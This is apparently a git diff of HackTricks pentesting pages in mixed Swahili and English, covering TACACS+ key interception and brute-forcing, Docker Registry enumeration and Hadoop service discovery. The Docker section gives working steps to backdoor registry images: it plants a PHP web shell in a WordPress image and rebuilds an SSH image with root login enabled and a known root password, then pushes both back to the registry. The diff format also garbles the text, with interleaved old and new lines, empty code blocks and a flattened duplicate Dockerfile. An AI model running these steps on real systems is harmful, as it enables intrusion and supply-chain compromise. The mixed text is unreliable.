# 49 - Pentesting TACACS+
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -22,56 +23,57 @@ Njia nyingine za kusaidia HackTricks:
***
## Taarifa Msingi
## Basic Information
Itifaki ya **Terminal Access Controller Access Control System (TACACS)** hutumika kwa kuthibitisha watumiaji kwa kati wanajaribu kupata mitambo au Seva za Kufikia Mtandao (NAS). Toleo lake lililoboreshwa, **TACACS+**, linagawanya huduma katika uthibitishaji, idhini, na uhasibu (AAA).
**Mfumo wa Kudhibiti Upatikanaji wa Kituo (TACACS)** unatumika kuthibitisha watumiaji kwa kati wanaojaribu kufikia route au Seva za Upatikanaji wa Mtandao (NAS). Toleo lake lililoboreshwa, **TACACS+**, linatenganisha huduma katika uthibitishaji, idhini, na uhasibu (AAA).
```
PORT STATE SERVICE
49/tcp open tacacs
```
**Bandari ya chaguo:** 49
**Default port:** 49
## Kukamata Kitufe cha Uthibitisho
## Intercept Authentication Key
Ikiwa mawasiliano kati ya mteja na seva ya TACACS yamekamatwa na mkaidi, **kitufe cha uthibitisho kilichofichwa kinaweza kukamatwa**. Mkaidi kisha anaweza kujaribu **shambulio la nguvu dhidi ya kitufe kwa usahihi bila kugunduliwa kwenye magogo**. Ikiwa shambulio la nguvu dhidi ya kitufe linafanikiwa, mkaidi anapata ufikiaji wa vifaa vya mtandao na anaweza kufichua trafiki kwa kutumia zana kama Wireshark.
Ikiwa mawasiliano kati ya mteja na seva ya TACACS yanakatizwa na mshambuliaji, **funguo ya uthibitishaji iliyosimbwa inaweza kukamatwa**. Mshambuliaji anaweza kisha kujaribu **shambulio la nguvu za ndani dhidi ya funguo bila kugundulika katika kumbukumbu**. Ikiwa atafanikiwa katika kujaribu nguvu funguo, mshambuliaji anapata ufikiaji wa vifaa vya mtandao na anaweza kufungua trafiki kwa kutumia zana kama Wireshark.
### Kutekeleza Shambulio la MitM
### Performing a MitM Attack
Shambulio la **ARP spoofing linaweza kutumika kutekeleza shambulio la Man-in-the-Middle (MitM)**.
**Shambulio la ARP spoofing linaweza kutumika kufanya shambulio la Man-in-the-Middle (MitM)**.
### Shambulio la Nguvu dhidi ya Kitufe
### Brute-forcing the Key
[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) inaweza kutumika kufanya shambulio la nguvu dhidi ya kitufe:
[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) inaweza kutumika kujaribu nguvu funguo:
```
sudo loki_gtk.py
```
Ikiwa funguo inabainishwa kwa mafanikio **(kawaida katika muundo uliofichwa wa MD5)**, **tunaweza kupata ufikiaji wa vifaa na kufichua trafiki iliyofichwa ya TACACS.**
If the key is successfully **bruteforced** (**usually in MD5 encrypted format)**, **we can access the equipment and decrypt the TACACS-encrypted traffic.**
### Kufichua Trafiki
Baada ya funguo kubainishwa kwa mafanikio, hatua inayofuata ni **kufichua trafiki iliyofichwa ya TACACS**. Wireshark inaweza kushughulikia trafiki iliyofichwa ya TACACS ikiwa funguo imetolewa. Kwa kuchambua trafiki iliyofichuliwa, habari kama **bango lililotumiwa na jina la mtumiaji wa mtumiaji wa usimamizi** inaweza kupatikana.
### Decrypting Traffic
Once the key is successfully cracked, the next step is to **decrypt the TACACS-encrypted traffic**. Wireshark can handle encrypted TACACS traffic if the key is provided. By analyzing the decrypted traffic, information such as the **banner used and the username of the admin** user can be obtained.
Kwa kupata ufikiaji wa kisanduku cha kudhibiti cha vifaa vya mtandao kwa kutumia sifa zilizopatikana, mshambuliaji anaweza kudhibiti mtandao. Ni muhimu kutambua kuwa hatua hizi ni kwa madhumuni ya elimu tu na hazipaswi kutumiwa bila idhini sahihi.
By gaining access to the control panel of network equipment using the obtained credentials, the attacker can exert control over the network. It's important to note that these actions are strictly for educational purposes and should not be used without proper authorization.
## Marejeo
## References
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

149
network-services-pentesting/5000-pentesting-docker-registry.md
View file

@ -1,61 +1,55 @@
# 5000 - Pentesting Docker Registry
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Mfumo wa uhifadhi na usambazaji unaojulikana kama **Docker registry** umewekwa kwa ajili ya picha za Docker ambazo zina majina na zinaweza kuja katika toleo mbalimbali, zilizotofautishwa na vitambulisho. Picha hizi zimepangwa ndani ya **maktaba za Docker** kwenye usajili, kila maktaba ikihifadhi toleo mbalimbali la picha fulani. Utendaji unaotolewa unaruhusu picha kupakuliwa kwa kifaa au kupakiwa kwenye usajili, ikizingatiwa kuwa mtumiaji ana ruhusa inayohitajika.
Mfumo wa kuhifadhi na kusambaza unaojulikana kama **Docker registry** umewekwa kwa ajili ya picha za Docker ambazo zimepewa majina na zinaweza kuja katika matoleo mbalimbali, yanayofautishwa na lebo. Picha hizi zimeandaliwa ndani ya **Docker repositories** katika registry, kila repository ikihifadhi matoleo mbalimbali ya picha maalum. Uwezo unaotolewa unaruhusu picha kupakuliwa kwa ndani au kupakiwa kwenye registry, ikiwa mtumiaji ana ruhusa zinazohitajika.
**DockerHub** hutumika kama usajili wa umma wa msingi kwa Docker, lakini watumiaji pia wana chaguo la kuendesha toleo la ndani la usajili/distribusheni ya Docker ya chanzo wazi au kuchagua **Docker Trusted Registry** inayoungwa mkono kibiashara. Aidha, usajili mbalimbali wa umma unaweza kupatikana mtandaoni.
Kupakua picha kutoka kwenye usajili wa ndani, amri ifuatayo hutumiwa:
**DockerHub** inatumika kama registry ya umma ya default kwa Docker, lakini watumiaji pia wana chaguo la kufanya kazi na toleo la ndani la Docker registry/distribution ya chanzo wazi au kuchagua **Docker Trusted Registry** inayoungwa mkono kibiashara. Zaidi ya hayo, registry mbalimbali za umma zinaweza kupatikana mtandaoni.
Ili kupakua picha kutoka kwa registry ya ndani, amri ifuatayo inatumika:
```bash
docker pull my-registry:9000/foo/bar:2.1
```
Hii amri inapata picha ya `foo/bar` toleo `2.1` kutoka kwenye usajili wa ndani kwenye kikoa cha `my-registry` kwenye bandari ya `9000`. Kinyume chake, ili kupakua picha hiyo hiyo kutoka DockerHub, hasa ikiwa `2.1` ni toleo jipya, amri inakuwa:
Hii amri inapata picha ya `foo/bar` toleo `2.1` kutoka kwenye rejista ya ndani kwenye kikoa cha `my-registry` kwenye bandari `9000`. Kinyume chake, ili kupakua picha hiyo hiyo kutoka DockerHub, hasa ikiwa `2.1` ndiyo toleo jipya zaidi, amri inakuwa rahisi:
```bash
docker pull foo/bar
```
**Bandari ya chaguo-msingi:** 5000
**Default port:** 5000
```
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
## Kugundua
Njia rahisi ya kugundua huduma hii inayotumika ni kuipata kwenye matokeo ya nmap. Hata hivyo, kumbuka kwamba kama ni huduma inayotegemea HTTP inaweza kuwa nyuma ya wakala wa HTTP na nmap haitaigundua.\
Baadhi ya alama za vidole:
Njia rahisi ya kugundua huduma hii inayoendesha ni kuipata kwenye matokeo ya nmap. Hata hivyo, kumbuka kwamba kwa kuwa ni huduma inayotumia HTTP inaweza kuwa nyuma ya proxies za HTTP na nmap haitagundua.\
Baadhi ya alama:
* Ukifika `/` hakuna kitu kinachorudi kwenye jibu
* Ukifika `/v2/` basi `{}` inarudi
* Ukifika `/v2/_catalog` unaweza kupata:
* Ikiwa unafikia `/` hakuna kinachorejeshwa kwenye jibu
* Ikiwa unafikia `/v2/` basi `{}` inarejeshwa
* Ikiwa unafikia `/v2/_catalog` unaweza kupata:
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
## Uchambuzi
## Uhesabu
### HTTP/HTTPS
Usajili wa Docker unaweza kuwa umewekwa kutumia **HTTP** au **HTTPS**. Kwa hivyo, jambo la kwanza unaloweza kulazimika kufanya ni **kugundua ni ipi** inayowekwa:
Docker registry inaweza kuwekewa mipangilio kutumia **HTTP** au **HTTPS**. Hivyo jambo la kwanza unalohitaji kufanya ni **kupata ni ipi** inayopangwa:
```bash
curl -s http://10.10.10.10:5000/v2/_catalog
#If HTTPS
@ -66,11 +60,9 @@ Warning: <FILE>" to save to a file.
#If HTTP
{"repositories":["alpine","ubuntu"]}
```
### Authentication
### Uthibitisho
Docker registry inaweza pia kusanidiwa kuhitaji **uthibitisho**:
Docker registry inaweza pia kuwekewa mipangilio ili kuhitaji **authentication**:
```bash
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
@ -78,18 +70,14 @@ curl -k https://192.25.197.3:5000/v2/_catalog
#If no authentication required
{"repositories":["alpine","ubuntu"]}
```
Ikiwa Usajili wa Docker unahitaji uthibitisho unaweza [**jaribu kuvunja nguvu kutumia hii**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
**Ikiwa unapata sifa halali utahitaji kuzitumia** kuchambua usajili, katika `curl` unaweza kuzitumia kama hivi:
Ikiwa Docker Registry inahitaji uthibitisho unaweza [**kujaribu kuikandamiza kwa kutumia hii**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
**Ikiwa utapata akidi halali utahitaji kuzitumia** kuhesabu rejista, katika `curl` unaweza kuzitumia kama hii:
```bash
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
```
### Enumeration using DockerRegistryGrabber
### Uchambuzi kwa kutumia DockerRegistryGrabber
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) ni chombo cha python cha kuchambua / kudump docker registry (bila au na uthibitishaji wa msingi)
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) ni chombo cha python cha kuorodhesha / kutupa docker degistry (bila au na uthibitisho wa msingi)
```bash
usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url
@ -163,11 +151,9 @@ python3 DockerGraber.py http://127.0.0.1 --dump_all
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
```
### Enumeration using curl
### Uchambuzi kwa kutumia curl
Mara baada ya **kupata ufikivu wa docker registry** hapa kuna baadhi ya amri unazoweza kutumia kuchambua:
Mara tu umepata **ufikiaji wa docker registry** hapa kuna baadhi ya amri unazoweza kutumia kuhesabu:
```bash
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
@ -230,13 +216,11 @@ curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fa
#Inspect the insides of each blob
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
```
{% hint style="warning" %}
Tafadhali kumbuka kwamba unapopakua na kufungua faili za blobs, faili na folda zitaonekana kwenye saraka ya sasa. **Ikiwa unapakua blobs zote na kuzifungua kwenye saraka moja zitafuta thamani kutoka kwa blobs zilizofunguliwa awali**, kwa hivyo kuwa mwangalifu. Inaweza kuwa ya kuvutia kufungua kila blob ndani ya saraka tofauti ili uchunguze maudhui halisi ya kila blob.
Kumbuka kwamba unaposhusha na kufungua faili za blobs, folda zitaonekana katika saraka ya sasa. **Ikiwa unashusha blobs zote na kuzifungua katika folda moja, zitaandika thamani kutoka kwa blobs zilizofunguliwa awali**, hivyo kuwa makini. Inaweza kuwa ya kuvutia kufungua kila blob ndani ya folda tofauti ili kukagua maudhui halisi ya kila blob.
{% endhint %}
### Uchambuzi kwa kutumia docker
### Uhesabuji kwa kutumia docker
```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu
@ -255,11 +239,10 @@ docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
### Kuingiza Backdoor kwenye picha ya WordPress
### Kuweka mlango nyuma kwa picha ya WordPress
Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza kuweka mlango nyuma.\
**Tengeneza** mlango **nyuma**:
Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza kuingiza backdoor.\
**Unda** backdoor:
{% code title="shell.php" %}
```bash
@ -267,62 +250,70 @@ Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza
```
{% endcode %}
Tengeneza **Dockerfile**:
Unda **Dockerfile**:
{% code title="Dockerfile" %}
```
```
{% endcode %}
```bash
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```
{% endcode %}
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **sukuma**:
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **tuma** hiyo:
```bash
docker build -t 10.10.10.10:5000/wordpress .
#Create
docker images
docker push registry:5000/wordpress #Push it
```
### Backdooring SSH server image
### Kuweka mlango wa nyuma kwenye picha ya seva ya SSH
Fikiria umepata Docker Registry na picha ya SSH na unataka kuweka mlango wa nyuma.\
**Pakua** picha hiyo na **itekeleze**:
Kufikiria kwamba umepata Docker Registry yenye picha ya SSH na unataka kuingiza nyuma.\
**Pakua** picha hiyo na **endesha**:
```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```
Chambua faili ya `sshd_config` kutoka kwenye picha ya SSH:
Kutoa faili la `sshd_config` kutoka kwenye picha ya SSH:
```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```
Na ibadilishe ili kuweka: `PermitRootLogin yes`
Na ubadilishe ili kuweka: `PermitRootLogin yes`
Unda **Dockerfile** kama ifuatavyo:
Unda **Dockerfile** kama ule ufuatao:
{% tabs %}
{% tab title="Dockerfile" %}
```bash
FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd
```
{% endtab %}
{% endtabs %}
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **sukuma** hiyo:
```bash
docker build -t 10.10.10.10:5000/sshd-docker-cli .
#Create
docker images
docker push registry:5000/sshd-docker-cli #Push it
```
## References
* [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
\`\`\`bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd\_config /etc/ssh/ RUN echo root:password | chpasswd \`\`\` \*\*Unda\*\* picha mpya, \*\*angalia\*\* imeundwa, na \*\*sukuma\*\*: \`\`\`bash docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create docker images docker push registry:5000/sshd-docker-cli #Push it \`\`\` ## Marejeo \* \[https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/]\(https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

42
network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
View file

@ -1,23 +1,24 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Taarifa Msingi**
# **Taarifa za Msingi**
**Apache Hadoop** ni **mfumo wa chanzo wazi** kwa **uhifadhi na usindikaji uliogawanyika** wa **seti kubwa za data** kwenye **vifurushi vya kompyuta**. Inatumia **HDFS** kwa uhifadhi na **MapReduce** kwa usindikaji.
**Apache Hadoop** ni **mfumo wa wazi** wa **hifadhi na usindikaji** wa **seti kubwa za data** katika **vikundi vya kompyuta**. Inatumia **HDFS** kwa ajili ya hifadhi na **MapReduce** kwa ajili ya usindikaji.
Kwa bahati mbaya, Hadoop haina msaada katika mfumo wa Metasploit wakati wa kudokumenti. Walakini, unaweza kutumia **Nmap scripts** zifuatazo kuchunguza huduma za Hadoop:
Kwa bahati mbaya, Hadoop haina msaada katika mfumo wa Metasploit wakati wa uandishi wa hati hii. Hata hivyo, unaweza kutumia **Nmap scripts** zifuatazo kuorodhesha huduma za Hadoop:
- **`hadoop-jobtracker-info (Port 50030)`**
- **`hadoop-tasktracker-info (Port 50060)`**
@ -26,18 +27,19 @@ Kwa bahati mbaya, Hadoop haina msaada katika mfumo wa Metasploit wakati wa kudok
- **`hadoop-secondary-namenode-info (Port 50090)`**
Ni muhimu kutambua kwamba **Hadoop inafanya kazi bila uwakilishi katika usanidi wake wa msingi**. Walakini, kwa usalama ulioimarishwa, mipangilio inapatikana kuunganisha Kerberos na huduma za HDFS, YARN, na MapReduce.
Ni muhimu kutambua kwamba **Hadoop inafanya kazi bila uthibitisho katika mipangilio yake ya msingi**. Hata hivyo, kwa usalama zaidi, mipangilio inapatikana kuunganisha Kerberos na HDFS, YARN, na huduma za MapReduce.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
